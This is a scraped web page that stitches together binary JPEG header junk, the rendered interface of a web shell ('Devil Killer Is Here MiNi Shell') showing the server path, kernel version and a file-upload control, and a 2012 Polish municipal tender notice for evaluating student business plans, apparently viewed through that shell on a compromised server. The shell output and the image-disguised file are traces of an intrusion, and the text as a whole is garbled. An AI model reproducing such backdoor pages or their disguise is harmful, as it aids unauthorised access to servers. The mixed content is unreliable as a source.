JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120229/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120229/48119-N-2012.html

<p class="kh_header"><b>Dąbrowa Górnicza: Usługi eksperckie polegające na ocenie 
biznes planów oraz analizie działania wirtualnych firm w ramach projektu Liderzy młodej przedsiębiorczości

Zadanie nr 1: Ocena biznes planów
Zadanie nr 2: Ocena biznes planów 
Zadanie nr 3: Ocena biznes planów
Zadanie nr 4: Ocena biznes planów 
Zadanie nr 5: Ocena biznes planów 
Zadanie nr 6: Analiza i ocena podejmowanych działań w ramach wirtualnych firm
Zadanie nr 7: Analiza i ocena podejmowanych działań w ramach wirtualnych firm
Zadanie nr 8: Analiza i ocena podejmowanych działań w ramach wirtualnych firm</b><br>
<b>Numer ogłoszenia: 48119 - 2012; data zamieszczenia: 29.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2956700, faks 032 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi eksperckie polegające na ocenie 
biznes planów oraz analizie działania wirtualnych firm w ramach projektu Liderzy młodej przedsiębiorczości

Zadanie nr 1: Ocena biznes planów
Zadanie nr 2: Ocena biznes planów 
Zadanie nr 3: Ocena biznes planów
Zadanie nr 4: Ocena biznes planów 
Zadanie nr 5: Ocena biznes planów 
Zadanie nr 6: Analiza i ocena podejmowanych działań w ramach wirtualnych firm
Zadanie nr 7: Analiza i ocena podejmowanych działań w ramach wirtualnych firm
Zadanie nr 8: Analiza i ocena podejmowanych działań w ramach wirtualnych firm.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie o udzielenie zamówienia publicznego prowadzone w trybie przetargu nieograniczonego na podstawie ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r., Nr 113, poz. 759 z późn. zm.)
o wartości zamówienia poniżej 200.000,00 EUR
1.Przedmiotem zamówienia są usługi eksperckie w zakresie oceny biznes planów 
stworzonych przez uczniów w branży turystycznej (zadania nr 1 - 5), a także usługi polegające na ocenie działalności wirtualnych firm stworzonych na bazie 5 wyłonionych biznes planów (zadania nr 6-8). 
Zamówienia udziela się w ramach projektu Liderzy młodej przedsiębiorczości, realizowanego przez Gminę Dąbrowa Górnicza od 1.06.2011 r. do 31.05.2012 r. 
w partnerstwie z Liderem - Fundacją Regionalnej Agencji Promocji Zatrudnienia 
w Dąbrowie Górniczej oraz Związkiem Gmin Jurajskich. Projekt dofinansowany jest 
ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu II Rozwój Zasobów Ludzkich i potencjału administracyjnego przedsiębiorstw oraz poprawa stanu zdrowia osób pracujących, Działanie 2.2 Wsparcie dla systemu adaptacyjności kadr. 
Poddziałanie 2.2.1 Poprawa jakości usług świadczonych przez instytucje wspierające rozwój przedsiębiorczości i innowacyjności.
Celem projektu jest promowanie przedsiębiorczości w obszarze sektorów turystyki wśród uczniów szkół ponadgimnazjalnych z terenu gmin Jury Krakowsko - Częstochowskiej poprzez edukację w zakresie podejmowania i prowadzenia działalności gospodarczej. 
Jednym z zadań, za które odpowiedzialna jest Gmina Dąbrowa Górnicza, jest przeprowadzenie oceny biznes planów sporządzonych przez kilkuosobowe grupy uczniów. Zostanie do tego zaangażowana komisja składająca się z 5 ekspertów. Ocena biznes planów odbędzie w ramach konkursu organizowanego przez Lidera, który ma odbyć się w marcu 2012 r. (zadanie nr 1 - 5).
Do kolejnego etapu, jakim jest ocena i analiza działań podejmowanych przez wirtualne firmy, zostanie zaangażowanych 3 ekspertów. Drugi etap przewidziany jest w okresie od drugiej połowy marca do połowy maja 2012 r. (zadanie nr 6 - 8).
Zadania ekspertów i przebieg prac komisji ds. oceny biznes planów (dot. zadań nr 1-5):
- merytoryczna ocena maksimum 21 biznes planów z sektora turystyki,
- współudział w komisji oceniającej biznes plany, 
- wypełnianie kart oceny z prezentacji poszczególnych biznes planów,
- bieżąca współpraca z Liderem i Zamawiającym,
- bieżące informowanie Zamawiającego o zaistniałych problemach,
- sporządzanie wszystkich wymaganych dokumentów i informacji, w tym protokołu
z posiedzeń komisji w dniach wykonywania usługi,
- prowadzenie ewidencji czasu pracy oraz rozliczanie wykonanych zadań    według zestawienia stanowiącego załącznik nr 1 do umowy,
- kryteria oceny: możliwość realizacji projektu (biznesu), uzasadnione potrzeby projektu (biznesu), wykazanie się przedsiębiorczością, rzetelność przeprowadzonej analizy rynku, innowacyjność, sposób prezentacji przed komisją, logika układu prezentacji, płynność 
i tempo prezentacji, umiejętność obrony własnych poglądów, odpowiedzi na pytania dodatkowe, umiejętność pracy w zespole
- przewidziany czas trwania każdej prezentacji: od 20 do 40 minut,
- forma prezentacji: multimedialna lub inna pozwalająca na zobrazowanie biznes planu, tj. makieta, plansze, itp. 
- przewidziana ilość godzin pracy dla każdego eksperta - maksymalnie 20 godzin w ciągu dwóch dni od dnia zawarcia umowy do  31.03.2012 r. 
  O dokładnym terminie świadczenia usługi Wykonawca zostanie poinformowany przez   Zamawiającego drogą elektroniczną lub pisemnie niezwłocznie po uzyskaniu   informacji od Lidera projektu, nie później niż 1 dzień przed terminem wykonania usługi,
- miejsce wykonywania usługi: o wyborze miejsca decyduje ilościowa przewaga biznes   planów z poszczególnych miast leżących na terenie Jury Krakowsko -   Częstochowskiej. Określenie miejsca będzie możliwe po zakończeniu naboru biznes   planów, tj. po 2 marca 2012 r. O dokładnym miejscu świadczenia usługi Wykonawca   zostanie  poinformowany indywidualnie przez Zamawiającego drogą elektroniczną lub   pisemnie min. 1 dzień przed rozpoczęciem usługi.
Wykonawca składa oświadczenie według załącznika nr 2 do umowy dotyczącego zaangażowania w innych projektach w celu wykluczenia podwójnego finansowania i zweryfikowania dyspozycyjności czasowej do wykonania zobowiązań wynikających z wszystkich projektów i jest zobowiązany do aktualizowania oświadczenia w przypadku wystąpienia zmian.
Wykonawca ponosi wszystkie koszty związane z wykonywaniem zlecenia poza siedzibą Zamawiającego, w szczególności koszty dojazdu, rozmów telefonicznych, zużycia materiałów biurowych, podstawowego sprzętu biurowego itp., a także koszty składek ubezpieczenia społecznego i 
Ubezpieczenia zdrowotnego, podatek VAT -  o ile zachodzi prawny obowiązek potrącenia składek w tym zakresie lub podatku VAT.
Wykonawca może złożyć tylko 1 ofertę z zakresu zadań od 1 do 5. Wykonawca, który złożył ofertę na zadanie z zakresu 1 do 5, może złożyć jedną ofertę na zadania z zakresu 6 do 8. 
Wykonawca zobowiązuje się wykonać przedmiot umowy przy udziale wskazanego w ofercie Eksperta. Ewentualna zmiana osoby pełniącej funkcję eksperta może nastąpić wyłącznie za zgodą Zamawiającego, o ile Wykonawca zapewni osobę o kwalifikacjach i doświadczeniu nie niższym od określonych w Specyfikacji Istotnych Warunków Zamówienia.
Zadania ekspertów i przebieg prac ekspertów ds. analizy wirtualnych firm (dot. zadań nr 6-8):
- analiza podejmowanych decyzji przez uczniów biorących udział w projekcie - autorów   zwycięskich biznes planów i analiza podejmowanych przez nich działań w ramach   tzw. wirtualnych firm,
- analiza umiejętności rozwiązywania problemów związanych z działaniem firmy,
- sporządzane protokołów z analizy,
- bieżąca współpraca z Liderem i Zamawiającym,
- bieżące informowanie Zamawiającego o zaistniałych problemach,
- sporządzanie wszystkich wymaganych dokumentów i informacji, w tym protokołu 
z analizy wirtualnych firm w dniach wykonania usługi,
- prowadzenia ewidencji czasu pracy oraz rozliczania wykonanych zadań   według zestawienia stanowiącego załącznik nr 1 do umowy,
- przewidywany termin wykonania usługi: między 20.03.2012 a 15.05.2012 r., 
  O dokładnym terminie świadczenia usługi Wykonawca zostanie poinformowany przez Zamawiającego drogą elektroniczną lub pisemnie niezwłocznie po uzyskaniu    informacji od Lidera projektu, nie później niż 2 dni  przed terminem wykonania usługi.
Każdy ekspert zobowiązany będzie do wykonania 25 analiz działalności wirtualnych firm, tj. działań podejmowanych przez autorów 5 biznes planów w 5-ciu różnych symulacjach rynkowych - max do 12 dni. 
Symulacje rynkowe zostaną opracowane przez zespół powołany przez Lidera projektu.
- miejsce wykonywania usługi: o wyborze miejsca decyduje ilościowa przewaga biznes   planów z poszczególnych miast leżących na terenie Jury Krakowsko -   Częstochowskiej. Określenie miejsca będzie możliwe po zakończeniu naboru biznes planów, tj. po 2 marca 2012 r. O dokładnym miejscu świadczenia usługi Wykonawca zostanie poinformowany indywidualnie przez Zamawiającego drogą elektroniczną lub pisemnie niezwłocznie po uzyskaniu informacji od Lidera projektu min. 2 dni przed rozpoczęciem usługi.
Wykonawca ponosi wszystkie koszty związane z wykonywaniem zlecenia poza siedzibą Zamawiającego, w szczególności koszty dojazdu, rozmów telefonicznych, zużycia materiałów biurowych, podstawowego sprzętu biurowego itp., a także koszty składek ubezpieczenia społecznego i ubezpieczenia zdrowotnego, podatek VAT - 
o ile zachodzi prawny obowiązek potrącenia składek w tym zakresie lub podatku VAT.
Wykonawca składa oświadczenie według załącznika nr 2 do umowy dotyczącego zaangażowania w innych projektach 
w celu wykluczenia podwójnego finansowania i zweryfikowania dyspozycyjności czasowej 
do wykonania zobowiązań wynikających z wszystkich projektów i jest zobowiązany do aktualizowania oświadczenia w przypadku wystąpienia zmian.
Wykonawca może złożyć tylko 1 ofertę z zakresu zadań od 6 do 8. Wykonawca, który złożył ofertę na zadanie z zakresu 6 do 8, może złożyć jedną ofertę na zadania z zakresu 1 do 5. 
Wykonawca zobowiązuje się wykonać przedmiot umowy przy udziale wskazanego w ofercie Eksperta. Ewentualna zmiana osoby pełniącej funkcję eksperta może nastąpić wyłącznie za zgodą Zamawiającego, o ile Wykonawca zapewni osobę o kwalifikacjach i doświadczeniu nie niższym od określonych w Specyfikacji Istotnych Warunków Zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.22.10.00-0, 79.21.21.10-7, 79.41.00.00-1, 79.41.11.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku w tym zakresie. Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 Pzp i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy zadania nr 1 - 5:
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, wykonał należycie co najmniej 1 usługę polegającą na doradztwie w zakresie sporządzenia biznes planów.

Dotyczy zadania nr 6 - 8:
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, wykonał należycie co najmniej 1 usługę polegającą na  zarządzaniu przedsiębiorstwem.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy zadania nr 1 - 5:
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej 1 osobą posiadającą: 
1.	wykształcenie wyższe o profilu ekonomicznym lub wyższe o dowolnym kierunku i ukończone studia podyplomowe ekonomiczne
2.	znajomość założeń Programu Operacyjnego Kapitał Ludzki 
3.	biegła znajomość obsługi komputera - MS Office, Word, Excel
4.	prawo jazdy kat. B. 

Dotyczy zadania nr 6 - 8:
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej 1 osobą posiadającą: 
1.	wykształcenie wyższe o profilu ekonomicznym lub wyższe o dowolnym kierunku i ukończone studia podyplomowe ekonomiczne i/lub min. 3 szkoleń w zakresie ekonomii,
2.	znajomość założeń Programu Operacyjnego Kapitał Ludzki,
3.	biegła znajomość obsługi komputera - MS Office, Word, Excel,
4.	prawo jazdy kat. B.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz ofertowy - załącznik nr 1/1 i (-lub) załącznik nr 1/2 do SIWZ (wskazana data podpisania);2. pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);2. zobowiązanie innych podmiotów, w szczególności pisemne, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, wymagane w przypadku gdy Wykonawca polega na ich zasobach na zasadach określonych w art. 26 ust. 2b  Ustawy, które  musi zawierać minimum: 
2.1.	dane pozwalające na identyfikacje stron
2.2.	zakres udostępniania (w zakresie wiedzy i doświadczenia, potencjału technicznego, osób zdolnych  do wykonania zamówienia i sytuacji  finansowej) oraz jego podstawa (np. umowa przedwstępna przyrzekająca zawarcie umowy o udostępnienie, umowy o podwykonawstwo,              o współpracy, porozumienie o delegowaniu pracowników, umowa oświadczenie  usług doradczych, know-how i inne umowy nienazwane) 
2.3.	cel i czas udostępnienia (obejmujący okres realizacji zamówienia).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwości dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w przypadku :
1. zmiany przepisów prawa Unii Europejskiej lub prawa krajowego, 
2.wystąpienia siły wyższej, która oznacza wydarzenie nieprzewidywalne i poza kontrolą Stron niniejszej umowy występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się 
z umowy w jej obecnym brzmieniu lub inne okoliczności niezależne od Zamawiającego, w tym takie, których przy zachowaniu należytej staranności nie był w stanie uniknąć lub przewidzieć wystąpienie typowych dla klimatu polskiego warunków atmosferycznych, gradobicia, trąb powietrznych i zjawisk niestandardowych w klimacie polskim,
3.zmiany harmonogramu realizacji projektu powodującej zmianę terminu realizacji zadań, na wykonanie których zawarta zostanie umowa. 
25.5. Pozostałe kwestie odnoszące się do umowy uregulowane są w załączniku nr 6/1, 6/2 do SIWZ - projekt umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, Wydział Oświaty, II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.03.2012 godzina 10:00, miejsce: Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, parter, Informacja - stanowisko nr 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie finansowane jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki na lata 2007-2013 Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego. 2. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określone w pkt 8 SIWZ oraz złożyć dokumenty  i oświadczenia potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w pkt 9 SIWZ.
3. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, dokumenty i oświadczenia wymienione w pkt  9.2.1. SIWZ Wykonawcy składają odrębnie, natomiast dokumenty wymienione w pkt 9.1.1., 9.1.2. - 9.1.3. SIWZ  Wykonawcy składają łącznie, przy czym oświadczenie wymienione w pkt 9.1.1. SIWZ oraz formularz  ofertowy wymieniony w pkt 9.3.1. SIWZ - winny być podpisane przez uprawnionego przedstawiciela Wykonawców lub wspólnie (na jednym druku) przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
4. Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowania i zawarcia umowy w sprawie zamówienia publicznego. 
5. Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem.
6. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania zamówienia. 7. Dot. sekcji IV.2.1. Dotyczy zadania nr 1-5
7.1. Cena musi uwzględniać wszystkie wymagania SIWZ oraz obejmować wszelkie koszty, jakie poniesie Wykonawca z tytułu należytej oraz zgodnej z obowiązującymi przepisami realizacji przedmiotu zamówienia, ,w tym koszty składek ubezpieczenia społecznego i ubezpieczenia zdrowotnego, podatek VAT - o ile zachodzi prawny obowiązek potrącenia składek w tym zakresie lub podatku VAT.
7.2. Podana w ofercie cena musi być wyrażona w PLN, z dokładnością do dwóch miejsc po przecinku z zastosowaniem przybliżenia dziesiętnego. Cena musi zawierać należny podatek VAT. 
7.3. Cena za wykonanie przedmiotu umowy obejmuje wszystkie obowiązki Wykonawcy w trakcie realizacji przedmiotu zamówienia, nie podlega negocjacjom. 
7.4. W ofercie należy podać cenę brutto za przedmiot zamówienia opisany w SIWZ. Ceną oferty jest iloczyn ceny brutto za sporządzenie 1 oceny biznes planu i przyjętej maksymalnej ilości biznes planów tj. 21 szt.
7.5. Zamówienie będzie realizowane do maksymalnej nominalnej wartości umowy wg fatycznej liczby ocenionych biznes planów.
Dotyczy zadania nr 6-8
